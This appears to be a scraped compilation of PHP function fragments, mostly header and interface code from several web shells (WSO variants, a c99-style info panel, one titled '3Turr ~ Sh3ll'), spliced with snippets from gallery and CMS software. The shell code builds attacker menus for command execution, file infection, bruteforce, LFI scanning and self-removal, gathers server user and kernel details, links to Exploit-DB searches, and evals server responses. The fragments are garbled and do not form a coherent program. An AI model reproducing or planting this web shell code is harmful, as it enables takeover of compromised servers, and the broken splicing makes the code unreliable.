if ($script_uid != $folder_uid) {
$message = sprintf(__('SAFE MODE Restriction in effect! You need to create the folder <strong>%s</strong> manually', 'nggallery'), $foldername);
$message .= '<br />' . sprintf(__('When safe_mode is on, PHP checks to see if the owner (%s) of the current script matches the owner (%s) of the file to be operated on by a file function or its directory', 'nggallery'), $script_uid, $folder_uid);
nggGallery::show_error($message);
return false;
}
}
return true;
}
protected function checkPermission($user, $group, $other)
{
$permissions = $this->stat['mode'] & 07777;
switch (true) {
case getmyuid() === $this->stat['uid']:
return ($permissions & $user) > 0;
case getmygid() === $this->stat['gid']:
return ($permissions & $group) > 0;
default:
return ($permissions & $other) > 0;
}
}
function eZSetupPrvPosixExtension()
{
$userInfo = array('has_extension' => false);
if (extension_loaded('posix')) {
$userInfo['has_extension'] = true;
$uinfo = posix_getpwuid(posix_getuid());
$ginfo = posix_getgrgid(posix_getgid());
$userInfo['user_name'] = $uinfo['name'];
$userInfo['user_id'] = $uinfo['uid'];
$userInfo['group_name'] = $ginfo['name'];
$userInfo['group_id'] = $ginfo['gid'];
$userInfo['group_members'] = $ginfo['members'];
$userInfo['script_user_id'] = getmyuid();
$userInfo['script_group_id'] = getmygid();
}
return $userInfo;
}
function wsoHeader()
{
if (empty($_POST['charset'])) {
$_POST['charset'] = $GLOBALS['default_charset'];
}
global $color;
echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION . "</title> \n<style> \nbody {background-color:#000;color:#fff;} \nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top; } \nspan,h1,a{ color: {$color} !important; } \nspan{ font-weight: bolder; } \nh1{ border:1px solid {$color};padding: 2px 5px;font: 14pt Verdana;margin:0px; } \ndiv.content{ padding: 5px;margin-left:5px;} \na{ text-decoration:none; } \na:hover{ background:#ff0000; } \n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } \n.bigarea{ width:100%;height:250px; } \ninput, textarea, select{ margin:0;color:#00ff00;background-color:#000;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; } \nform{ margin:0px; } \n#toolsTbl{ text-align:center; } \n.toolsInp{ width: 80%; } \n.main th{text-align:left;} \n.main tr:hover{background-color:#5e5e5e;} \n.main td, th{vertical-align:middle;} \npre{font-family:Courier,Monospace;} \n#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);} \n</style> \n<script> \n var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; \n var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\n var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "'; \n var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "'; \n var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "'; \n var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "'; \n var d = document; \n function set(a,c,p1,p2,p3,charset) { \n if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; \n if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; \n if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; \n if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; \n if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; \n if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; \n } \n function g(a,c,p1,p2,p3,charset) { \n set(a,c,p1,p2,p3,charset); \n d.mf.submit(); \n } \n function a(a,c,p1,p2,p3,charset) { \n set(a,c,p1,p2,p3,charset); \n var params = 'ajax=true'; \n for(i=0;i<d.mf.elements.length;i++) \n params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); \n sr('" . addslashes($_SERVER['REQUEST_URI']) . "', params); \n } \n function sr(url, params) { \n if (window.XMLHttpRequest) \n req = new XMLHttpRequest(); \n else if (window.ActiveXObject) \n req = new ActiveXObject('Microsoft.XMLHTTP'); \n if (req) { \n req.onreadystatechange = processReqChange; \n req.open('POST', url, true); \n req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); \n req.send(params); \n } \n } \n function processReqChange() { \n if( (req.readyState == 4) ) \n if(req.status == 200) { \n var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); \n var arr=reg.exec(req.responseText); \n eval(arr[2].substr(0, arr[1])); \n } else alert('Request error!'); \n } \n</script> \n<head><body><div style='position:absolute;width:100%;background-color:#000;top:0;left:0;'> \n<form method=post name=mf style='display:none;'> \n<input type=hidden name=a> \n<input type=hidden name=c> \n<input type=hidden name=p1> \n<input type=hidden name=p2> \n \n<input type=hidden name=p3> \n<input type=hidden name=charset> \n</form>";
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace ? $totalSpace : 1;
$release = @php_uname('r');
$kernel = @php_uname('s');
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n = count($path);
for ($i = 0; $i < $n - 1; $i++) {
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for ($j = 0; $j <= $i; $j++) {
$cwd_links .= $path[$j] . '/';
}
$cwd_links .= "\")'>" . $path[$i] . "/</a>";
}
$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach ($charsets as $item) {
$opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';
}
$m = array('Sec Info' => 'SecInfo', 'Files' => 'FilesMan', 'Exec' => 'Console', 'Sql' => 'Sql', 'PHP Tools' => 'phptools', 'LFI' => 'lfiscan', 'Php' => 'Php', 'Safe mode' => 'SafeMode', 'String tools' => 'StringTools', 'XSS Shell' => 'XSSShell', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network');
if (!empty($GLOBALS['auth_pass'])) {
$m['Logout'] = 'Logout';
}
$m['Self remove'] = 'SelfRemove';
$menu = '';
foreach ($m as $k => $v) {
$menu .= '<th width="' . (int) (100 / count($m)) . '%">[<a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a>]</th>';
}
$drives = "";
if ($GLOBALS['os'] == 'win') {
foreach (range('c', 'z') as $drive) {
if (is_dir($drive . ':\\')) {
$drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
}
}
}
echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' </nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=#00bb00><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
}
function hardHeader()
{
if (empty($_POST['charset'])) {
$_POST['charset'] = $GLOBALS['▜'];
}
echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION . "</title>\n<style>\n\tbody {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}\n\tbody,td,th\t{font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}\n\ttable.info\t{color:#C3C3C3;background-color: #060A10;}\n\ttable#toolsTbl {background-color: #060A10;}\n\tspan,h1,a\t{color:#fff !important;}\n\tspan\t\t{font-weight:bolder;}\n\th1\t\t\t{border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}\n\tdiv.content\t{padding:5px;margin-left:5px;background-color:#060a10;}\n\ta\t\t\t{text-decoration:none;}\n\ta:hover\t\t{text-decoration:underline;}\n\t.tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}\n\t.tooltip:hover::after {opacity:1;visibility:visible;}\n\t.ml1\t\t{border:1px solid #1e252f;padding:5px;margin:0;overflow:auto;}\n\t.bigarea\t{min-width:100%;max-width:100%;height:400px;}\n\tinput, textarea, select\t{margin:0;color:#fff;background-color:#1e252f;border:none;font:9pt Courier New;outline:none;}\n\tlabel {position:relative}\n\tlabel:after {content:'<>';font:10px 'Consolas', monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px; top:3px;padding:0;position:absolute;pointer-events:none;}\n\tlabel:before {content:'';right:0; top:0;width:17px; height:17px;background:#1e252f;position:absolute;pointer-events:none;display:block;}\n\tform\t\t{margin:0px;}\n\t#toolsTbl\t{text-align:center;}\n\t#fak \t\t{background:none;}\n\t#fak td \t{padding:5px 0 0 0;}\n\tiframe\t\t{border:1px solid #060a10;}\n\t.toolsInp\t{width:300px}\n\t.main th\t{text-align:left;background-color:#060a10;}\n\t.main tr:hover{background-color:#354252;}\n\t.main td, th{vertical-align:middle;}\n\tinput[type='submit']{background-color:#2E6E9C;}\n\tinput[type='button']{background-color:#2E6E9C;}\n\tinput[type='submit']:hover{background-color:#56AD15;}\n\tinput[type='button']:hover{background-color:#56AD15;}\n\t.l1\t\t\t{background-color:#1e252f;}\n\tpre\t\t\t{font:9pt Courier New;}\n</style>\n<script>\n var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\n var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\n var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\n var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\n var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\n var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\n var d = document;\n\t\n\tfunction encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}\n\tfunction utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}\n\tfunction base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}\n\tfunction set(a,c,p1,p2,p3,charset) {\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\n\t\td.mf.a.value = encrypt(d.mf.a.value,'" . $_COOKIE[md5($_SERVER['HTTP_HOST']) . "key"] . "');\n\t\td.mf.c.value = encrypt(d.mf.c.value,'" . $_COOKIE[md5($_SERVER['HTTP_HOST']) . "key"] . "');\n\t\td.mf.p1.value = encrypt(d.mf.p1.value,'" . $_COOKIE[md5($_SERVER['HTTP_HOST']) . "key"] . "');\n\t\td.mf.p2.value = encrypt(d.mf.p2.value,'" . $_COOKIE[md5($_SERVER['HTTP_HOST']) . "key"] . "');\n\t\td.mf.p3.value = encrypt(d.mf.p3.value,'" . $_COOKIE[md5($_SERVER['HTTP_HOST']) . "key"] . "');\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\n\t}\n\tfunction g(a,c,p1,p2,p3,charset) {\n\t\tset(a,c,p1,p2,p3,charset);\n\t\td.mf.submit();\n\t}\n\tfunction a(a,c,p1,p2,p3,charset) {\n\t\tset(a,c,p1,p2,p3,charset);\n\t\tvar params = 'ajax=true';\n\t\tfor(i=0;i<d.mf.elements.length;i++)\n\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\n\t\tsr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);\n\t}\n\tfunction sr(url, params) {\n\t\tif (window.XMLHttpRequest)\n\t\t\treq = new XMLHttpRequest();\n\t\telse if (window.ActiveXObject)\n\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\n if (req) {\n req.onreadystatechange = processReqChange;\n req.open('POST', url, true);\n req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\n req.send(params);\n }\n\t}\n\tfunction processReqChange() {\n\t\tif( (req.readyState == 4) )\n\t\t\tif(req.status == 200) {\n\t\t\t\tvar reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');\n\t\t\t\tvar arr=reg.exec(req.responseText);\n\t\t\t\teval(arr[2].substr(0, arr[1]));\n\t\t\t} else alert('Request error!');\n\t}\n</script>\n<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>\n<form method=post name=mf style='display:none;'>\n<input type=hidden name=a>\n<input type=hidden name=c>\n<input type=hidden name=p1>\n<input type=hidden name=p2>\n<input type=hidden name=p3>\n<input type=hidden name=charset>\n</form>";
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace ? $totalSpace : 1;
$release = @php_uname('r');
$kernel = @php_uname('s');
$explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=';
if (strpos('Linux', $kernel) !== false) {
$explink .= urlencode('Linux Kernel ' . substr($release, 0, 6));
} else {
$explink .= urlencode($kernel . ' ' . substr($release, 0, 3));
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n = count($path);
for ($i = 0; $i < $n - 1; $i++) {
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for ($j = 0; $j <= $i; $j++) {
$cwd_links .= $path[$j] . '/';
}
$cwd_links .= "\")'>" . $path[$i] . "/</a>";
}
$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach ($charsets as $▟) {
$opt_charsets .= '<option value="' . $▟ . '" ' . ($_POST['charset'] == $▟ ? 'selected' : '') . '>' . $▟ . '</option>';
}
$m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Infect' => 'Infect', 'Sql' => 'Sql', 'Php' => 'Php', 'Safe mode' => 'SafeMode', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network');
if (!empty($GLOBALS['▛'])) {
$m['Logout'] = 'Logout';
}
$m['Self remove'] = 'SelfRemove';
$menu = '';
foreach ($m as $k => $v) {
$menu .= '<th>[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>';
}
$drives = "";
if ($GLOBALS['os'] == 'win') {
foreach (range('c', 'z') as $drive) {
if (is_dir($drive . ':\\')) {
$drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
}
}
}
/* (С) 08.2015 dmkcv */
echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://noreferer.de/?http://www.google.com/search?q=' . urlencode(@php_uname()) . '" target="_blank">[ Google ]</a> <a href="' . $explink . '" target=_blank>[ Exploit-DB ]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=#FFDB5F><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' (' . round(100 / ($totalSpace / $freeSpace), 2) . '%)<br>' . $cwd_links . ' ' . viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">' . $opt_charsets . '</select></label><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div>';
}
function stream_stat()
{
return array(0, 0, 0, 0, getmyuid(), getmygid(), 0, strlen($GLOBALS[$this->varname]), time(), time(), time(), -1, -1);
}
echo '<font color=blue><b>uname -a :' . ws(1) . '<br>sysctl :' . ws(1) . '<br>$OSTYPE :' . ws(1) . '<br>Server :' . ws(1) . '<br>id :' . ws(1) . '<br>pwd :' . ws(1) . '</b></font><br>';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
echo !empty($uname) ? ws(3) . @substr($uname, 0, 120) . "<br>" : ws(3) . @substr(@php_uname(), 0, 120) . "<br>";
echo ws(3) . $sysctl . "<br>";
echo ws(3) . ex('echo $OSTYPE') . "<br>";
echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>";
if (!empty($id)) {
echo ws(3) . $id . "<br>";
} else {
if (function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid')) {
$euserinfo = @posix_getpwuid(@posix_geteuid());
$egroupinfo = @posix_getgrgid(@posix_getegid());
echo ws(3) . 'uid=' . $euserinfo['uid'] . ' ( ' . $euserinfo['name'] . ' ) gid=' . $egroupinfo['gid'] . ' ( ' . $egroupinfo['name'] . ' )<br>';
} else {
echo ws(3) . "user="******" uid=" . @getmyuid() . " gid=" . @getmygid() . "<br>";
}
}
echo ws(3) . $dir;
echo ws(3) . '( ' . perms(@fileperms($dir)) . ' )';
echo "</b></font>";
} else {
echo '<font color=blue><b>OS :' . ws(1) . '<br>Server :' . ws(1) . '<br>User :'******'<br>pwd :' . ws(1) . '</b></font><br>';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
echo ws(3) . @substr(@php_uname(), 0, 120) . "<br>";
echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>";
echo ws(3) . @getenv("USERNAME") . "<br>";
echo ws(3) . $dir;
echo "<br></font>";
}
function yemenhead()
{
if (empty($_POST['charset'])) {
$_POST['charset'] = $GLOBALS['default_charset'];
}
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace ? $totalSpace : 1;
$on = "<font color=#0F0> ON </font>";
$of = "<font color=red> OFF </font>";
$none = "<font color=#0F0> NONE </font>";
if (function_exists('curl_version')) {
$curl = $on;
} else {
$curl = $of;
}
if (function_exists('mysql_get_client_info')) {
$mysql = $on;
} else {
$mysql = $of;
}
if (function_exists('mssql_connect')) {
$mssql = $on;
} else {
$mssql = $of;
}
if (function_exists('pg_connect')) {
$pg = $on;
} else {
$pg = $of;
}
if (function_exists('oci_connect')) {
$or = $on;
} else {
$or = $of;
}
if (@ini_get('disable_functions')) {
$disfun = '<span>Disabled functions : </span><font color=red style="word-wrap: break-word;width: 80%; " >' . @str_replace(',', ', ', @ini_get('disable_functions')) . '</font>';
} else {
$disfun = "<span>Disabled Functions: </span><font color=#00ff00 >All Functions Enable</font>";
}
if (@ini_get('safe_mode')) {
$safe_modes = "<font color=red>ON</font>";
} else {
$safe_modes = "<font color=#0F0 >OFF</font>";
}
if (@ini_get('open_basedir')) {
$open_b = @ini_get('open_basedir');
} else {
$open_b = $none;
}
if (@ini_get('safe_mode_exec_dir')) {
$safe_exe = @ini_get('safe_mode_exec_dir');
} else {
$safe_exe = $none;
}
if (@ini_get('safe_mode_include_dir')) {
$safe_include = @ini_get('safe_mode_include_dir');
} else {
$safe_include = $none;
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n = count($path);
for ($i = 0; $i < $n - 1; $i++) {
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for ($j = 0; $j <= $i; $j++) {
$cwd_links .= $path[$j] . '/';
}
$cwd_links .= "\")'>" . $path[$i] . "/</a>";
}
$drives = "";
foreach (range('c', 'z') as $drive) {
if (is_dir($drive . ':')) {
$drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . base64_encode($drive . ':/') . '\')">[ ' . $drive . ' ]</a> ';
}
}
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>3Turr ~ Sh3ll</title>
<link rel="shortcut icon" type="image/x-icon" href="https://avatars1.githubusercontent.com/u/13343571?v=3&s=460">
<script language="javascript">
function Encoder(name)
{
var e = document.getElementById(name);
e.value = btoa(e.value);
return true;
}
function Encoder2(name)
{
var e = document.getElementById(name);
e.value = btoa(e.value);
return true;
}
</script>
<style type="text/css">
<!--
.headera {
color: red;
}
.whole {
height:auto;
width: auto;
margin-top: 10px;
margin-right: 10px;
margin-left: 10px;
background-image: linear-gradient(
rgba(0, 0, 0, 0.4),
rgba(0, 0, 0, 0.4)
), url(http://img03.arabsh.com/uploads/image/2012/09/11/0d37424266f70d.png);
}
.header {
table-layout: fixed;
height: auto;
width: auto;
border: 4px solid #5BEEFF;
color: yellow;
font-size: 12px;
font-family: Verdana, Geneva, sans-serif;
}
tr {
display: table-row;
vertical-align: inherit;
padding-right:10px;
}table {
display: table;
border-collapse: separate;
border-spacing: 2px;
border-color: #5BEEFF;
}
.header a {color:#0F0; text-decoration:none;}
span {
font-weight: bolder;
color: #FFF;
}
#meunlist {
font-family: Verdana, Geneva, sans-serif;
color: #FFF;
background-color: #000;
width: auto;
border-right-width: 7px;
border-left-width: 7px;
border-top-style: solid;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: solid;
border-color: #5BEEFF;
height: auto;
font-size: 12px;
font-weight: bold;
border-top-width: 0px;
}
.whole #meunlist ul {
padding-top: 5px;
padding-right: 5px;
padding-bottom: 7px;
padding-left: 2px;
text-align:center;
list-style-type: none;
margin: 0px;
}
.whole #meunlist li {
margin: 0px;
padding: 0px;
display: inline;
}
.whole #meunlist a {
font-family: arial, sans-serif;
font-size: 14px;
text-decoration:none;
font-weight: bold;
color: #fff;
clear: both;
width: 100px;
margin-right: -6px;
padding-top: 3px;
padding-right: 15px;
padding-bottom: 3px;
padding-left: 15px;
border-right-width: 1px;
border-right-style: solid;
border-right-color: #FFF;
}
.whole #meunlist a:hover {
color: red;
background: #fff;
}
.menu a:hover { background:#5BEEFF;}
a:hover { color:red;background:black;}
.ml1 { border:1px solid #2438CF;padding:5px;margin:0;overflow: auto; }
.bigarea { width:100%;height:250px; border:1px solid red; background:#171717;}
input, textarea, select { margin:0;color:#FF0000;background-color:#000;border:1px solid #5BEEFF; font: 9pt Monospace,"Times New roman"; }
form { margin:0px; }
#toolsTbl { text-align:center; }
.toolsInp { width: 80%; }
.main th {text-align:left;background-color:#990000;color:white;}
.main td, th{vertical-align:middle;}
pre {font-family:Courier,Monospace;}
#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
}';
if (is_writable($GLOBALS['cwd'])) {
echo ".foottable {\n width: 300px;\n font-weight: bold;\n }";
} else {
echo ".foottable {\n width: 300px;\n font-weight: bold;\n background-color:red;\n }\n .dir {\n background-color:red; \n }\n ";
}
echo '.main th{text-align:left;}
.main a{color: #FFF;}
.main tr:hover{background-color:red;}
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:99%; height:300px; }
</style>
';
echo "<script>\n var c_ = '" . base64_encode(htmlspecialchars($GLOBALS['cwd'])) . "';\n var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\n var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\n var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\n var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\n var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\n var d = document;\n\tfunction set(a,c,p1,p2,p3,charset) {\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\n\t}\n\tfunction g(a,c,p1,p2,p3,charset) {\n\t\tset(a,c,p1,p2,p3,charset);\n\t\td.mf.submit();\n\t}</script>";
echo '
</head>
<div class="whole1"></div>
<body bgcolor="#000000" color="red" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
